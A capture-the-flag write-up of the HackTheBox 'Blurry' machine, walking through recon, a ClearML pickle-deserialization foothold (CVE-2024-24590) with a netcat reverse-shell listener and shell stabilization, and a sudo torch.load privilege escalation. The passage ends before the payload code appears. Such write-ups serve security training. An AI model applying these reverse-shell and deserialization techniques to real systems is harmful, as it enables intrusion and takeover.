June 14, 2024HackTheBoxLinuxMediumCVE-2024-24590ClearMLPyTorch10 min read
Blurry starts with subdomain enumeration revealing a ClearML MLOps platform at app.blurry.htb. After registering and configuring the SDK, we exploit CVE-2024-24590 (unsafe pickle deserialization on artifact load) for a foothold as jippity. Root is reached by crafting a malicious PyTorch model (.pth) that exploits a misconfigured sudo rule — evaluate_model calls torch.load(), triggering a second deserialization as root.
Initial scan finds SSH and an nginx web server that immediately redirects to app.blurry.htb.
nmap — initial scan
SP1R4@kali)-[~/HTB/blurry]└$ nmap -sV -sC -oN nmap.txt 10.10.11.19PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
hosts — add entries
echo "10.10.11.19 app.blurry.htb files.blurry.htb chat.blurry.htb api.blurry.htb blurry.htb" | sudo tee -a /etc/hosts
Subdomain Enumeration
gobuster dns
SP1R4@kali)-[~/HTB/blurry]└$ gobuster dns -d "blurry.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txtFound: files.blurry.htbFound: app.blurry.htbFound: chat.blurry.htb
chat.blurry.htb — Rocket.Chat
Browsing the Rocket.Chat instance after registering reveals team conversations.
The admin user is jippity and the team is building AI tooling — useful context for what runs on app.blurry.htb.
app.blurry.htb — ClearML
ClearML is an open-source MLOps platform for tracking AI/ML experiments. Submitting any name grants developer access and provides API credentials. We need to add api.blurry.htb to hosts before running the SDK init.
clearml — setup
pip install virtualenv && python3 -m venv .env && source .env/bin/activatepip install clearmlclearml-init# paste the config from the web UI settings page when prompted
Searching for known ClearML CVEs surfaces a batch of disclosures from early 2024. The one that matters for us:
CVE
Description
Used
CVE-2024-24590
Pickle Load on Artifact Get — unsafe deserialization
✓ foothold
CVE-2024-24591
Path Traversal on File Download
—
CVE-2024-24592
Improper Auth → Arbitrary Read-Write
—
CVE-2024-24593
CSRF in ClearML Server
—
CVE-2024-24594
XSS via HTML rendering
—
CVE-2024-24595
Plaintext creds in MongoDB
—
When a ClearML agent processes a task, it downloads the artifact and calls pickle.load() without validation. By crafting an object with a malicious __reduce__ method, we execute arbitrary code the moment the agent picks up our task.
Foothold
CVE-2024-24590 — Pickle Deserialization
We create a class whose __reduce__ returns a reverse shell command, upload it as a ClearML artifact tagged review, and queue it. The admin agent executes it automatically.
# Start listener before running the exploitnc -lvnp 4444# Once connected — stabilizepython3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xterm# Ctrl+Zstty raw -echo; fgjippity@blurry:~$
🚩 Shell as jippity. User flag captured.
Privilege Escalation
sudo -l
sudo permissions
jippity@blurry:~$ sudo -lUser jippity may run the following commands on blurry:
(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
The evaluate_model script loads model files with torch.load() — which internally calls pickle.load(). We also have write access to /models/:
check /models permissions
jippity@blurry:~$ ls -la / | grep modelsdrwxrwxr-x 2 root jippity 4096 Jun 13 13:32 models
ⓘ torch.load() == pickle.load() — PyTorch .pth files are pickle-serialized objects. Any class with a custom __reduce__ will execute arbitrary code on load.
Malicious PyTorch Model
We craft a model class that overrides __reduce__ with a reverse shell, save it as a .pth file, and drop it into /models/.
